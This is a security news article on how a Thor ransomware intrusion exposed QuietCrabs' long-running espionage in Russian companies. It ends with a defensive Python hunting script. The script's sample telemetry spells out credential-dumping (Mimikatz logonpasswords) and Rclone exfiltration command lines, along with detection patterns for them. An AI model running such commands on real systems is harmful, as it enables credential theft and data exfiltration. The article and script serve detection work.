Noisy Ransomware Uncovered a Long-Term Espionage Operation

▼ Summary
– A dual cyberattack by the QuietCrabs and Thor groups on Russian companies had an unexpected benefit: Thor’s noisier intrusion drew attention to QuietCrabs’ stealthier, long-term espionage operation.
– Both threat groups exploited known vulnerabilities in Microsoft SharePoint and Ivanti solutions to gain initial access to the victim organizations.
– The QuietCrabs group used the custom KrustyLoader malware together with the open-source Sliver C2 framework for espionage, while the Thor group relied on widely available tools such as Mimikatz and Rclone, most likely as precursors to ransomware deployment.
– Researchers believe the attacks were coincidental, not collaborative, as both groups broadly scan for targets, but Thor’s early detection prevented its ransomware from being deployed.
– The investigation revealed QuietCrabs typically remains undetected for nearly 400 days, and Thor has potentially compromised around 110 Russian companies across various sectors.
Discovering a stealthy cyber espionage campaign often requires a stroke of luck, and sometimes that luck comes in the form of a much louder, more disruptive attack. A recent investigation into two Russian companies revealed exactly this scenario, where a ransomware group’s noisy activities inadvertently exposed a long-running, sophisticated espionage operation that had likely been hiding in the shadows. This incident underscores a critical lesson for security teams: a visible breach can sometimes be a distraction from a far more insidious and patient threat.
Security analysts from Positive Technologies detailed a case where two distinct threat groups compromised the same organizations almost simultaneously. The first, known as QuietCrabs, is a cyber espionage actor believed to originate in Asia. The second, tracked as Thor, is a group known for targeting Russian entities with ransomware like LockBit and Babuk. Both attackers gained initial access by exploiting the same set of publicly known vulnerabilities in Microsoft SharePoint Server and various Ivanti solutions.
The intrusion methods, however, diverged sharply. QuietCrabs employed a multi-stage attack chain involving an ASPX web shell, the unique KrustyLoader malware, and the Sliver command-and-control framework. Thor’s approach was less subtle: a toolkit of publicly available offensive utilities such as Mimikatz and Rclone, used for reconnaissance, credential theft and privilege escalation, data exfiltration, and persistence. Ironically, it was Thor’s conspicuous activity that triggered the security investigation, which in turn uncovered the far quieter QuietCrabs infection.
Researchers noted the timing was remarkably close, with only a few days separating the groups’ activities. The investigation began when Thor’s actions were first detected. Without this noisy ransomware precursor, the QuietCrabs intrusion might have persisted undetected for much longer: historical data suggests the group maintains an average dwell time of 393 days within victim networks. Attribution to QuietCrabs rested on the presence of KrustyLoader, malware uniquely associated with the group’s operations.
The Thor attribution was based on forensic evidence matching previous reports from other cybersecurity firms. While both groups exploited the same entry points, researchers believe their simultaneous presence was coincidental, the result of broad, opportunistic scanning rather than collaboration. The SharePoint ToolShell vulnerability (CVE-2025-53770) has become a popular gateway for a wide range of threat actors, including Chinese state-sponsored groups and financially motivated ransomware operators.
The targeting profiles of the two groups also differ. QuietCrabs has a global footprint, with victims identified across North America, Europe, and Asia. In contrast, Thor appears to focus predominantly on Russian organizations, with approximately 110 companies potentially affected across various economic sectors. This incident serves as a powerful reminder that a single security event can mask a deeper, more dangerous compromise, and that comprehensive threat hunting is essential even after an immediate incident is contained.
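The practical lesson of the case, that an investigation triggered by loud tooling must widen into a hunt for quieter indicators across the estate, can be turned into a small hunting script. The example below is an added illustration, not code from Positive Technologies or HelpNet Security. It runs over constructed endpoint telemetry (process-creation and file-creation events in a hypothetical pipe-delimited format; the host names and paths are made up) and separates two tiers of findings: "loud" hits on the utilities the article names for Thor (Mimikatz, Rclone), and "quiet" hits on generic web-shell indicators consistent with the ASPX web shell attributed to QuietCrabs (the IIS worker process w3wp.exe spawning a shell, and a new .aspx file under the SharePoint LAYOUTS directory). The specific rules and paths are assumptions for the example, not indicators published for these groups.

```python
"""Two-tier hunt over constructed endpoint events: report hosts with loud
ransomware-precursor tooling separately from hosts whose only indicators are
quiet web-shell signs, so the latter are not lost in the response to the former."""
import re
from collections import defaultdict

# Constructed sample telemetry (not real data). Format: host|event|image|target
# For ProcessCreate, target is the child command line; for FileCreate, the path.
SAMPLE_EVENTS = r"""
SP-WEB01|ProcessCreate|C:\Windows\System32\inetsrv\w3wp.exe|cmd.exe /c whoami
SP-WEB01|FileCreate|C:\Windows\System32\inetsrv\w3wp.exe|C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\upd.aspx
FS-01|ProcessCreate|C:\Users\svc_backup\Desktop\mimikatz.exe|mimikatz.exe "sekurlsa::logonpasswords"
FS-01|ProcessCreate|C:\Tools\rclone.exe|rclone.exe copy D:\Shares\Finance mega:exfil -q
WS-17|ProcessCreate|C:\Windows\System32\notepad.exe|notepad.exe report.txt
SP-WEB02|FileCreate|C:\Windows\System32\inetsrv\w3wp.exe|C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug.aspx
"""

# Assumed rules for the example. Loud tier: utilities the article names for Thor.
LOUD_TOOLS = re.compile(r"\b(mimikatz|rclone)(\.exe)?\b", re.I)
# Quiet tier: generic web-shell signs on a SharePoint front end (assumed, not
# indicators published for QuietCrabs).
LAYOUTS_DIR = re.compile(r"\\web server extensions\\\d+\\template\\layouts\\", re.I)
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def parse_event(line):
    host, event, image, target = line.split("|", 3)
    return {"host": host, "event": event, "image": image, "target": target}


def classify(ev):
    """Return (tier, reason) for a matching event, or None."""
    image_name = ev["image"].rsplit("\\", 1)[-1].lower()
    target = ev["target"]
    if ev["event"] == "ProcessCreate":
        m = LOUD_TOOLS.search(target)
        if m:
            return ("loud", f"known offensive utility: {m.group(1).lower()}")
        if image_name == "w3wp.exe":
            child = target.split()[0].rsplit("\\", 1)[-1].lower()
            if child in SHELL_CHILDREN:
                return ("quiet", f"IIS worker spawned {child}")
    if ev["event"] == "FileCreate" and target.lower().endswith(".aspx"):
        if LAYOUTS_DIR.search(target):
            name = target.rsplit("\\", 1)[-1]
            return ("quiet", f"new ASPX in SharePoint LAYOUTS: {name}")
    return None


def hunt(raw):
    """Group classified findings per host: {host: {"loud": [...], "quiet": [...]}}."""
    findings = defaultdict(lambda: {"loud": [], "quiet": []})
    for line in raw.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        hit = classify(ev)
        if hit:
            tier, reason = hit
            findings[ev["host"]][tier].append(reason)
    return dict(findings)


def triage(findings):
    """Return (hosts that tripped on loud tooling, hosts with ONLY quiet indicators).
    The second list is what a containment-focused response is likely to miss."""
    loud_hosts = sorted(h for h, f in findings.items() if f["loud"])
    quiet_only = sorted(h for h, f in findings.items() if f["quiet"] and not f["loud"])
    return loud_hosts, quiet_only


if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS)
    loud, quiet = triage(results)
    print("Hosts with loud tooling (likely already alerting):", loud)
    print("Hosts with quiet indicators only (hunt targets):", quiet)
    for host in quiet:
        for reason in results[host]["quiet"]:
            print(f"  {host}: {reason}")
```

On the constructed sample, only FS-01 trips the loud tier, while SP-WEB01 and SP-WEB02 surface solely through the quiet tier; in a real engagement the quiet rules would be baselined against a known-good inventory of .aspx files and IIS child processes to keep the noise down.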
(Source: HelpNet Security)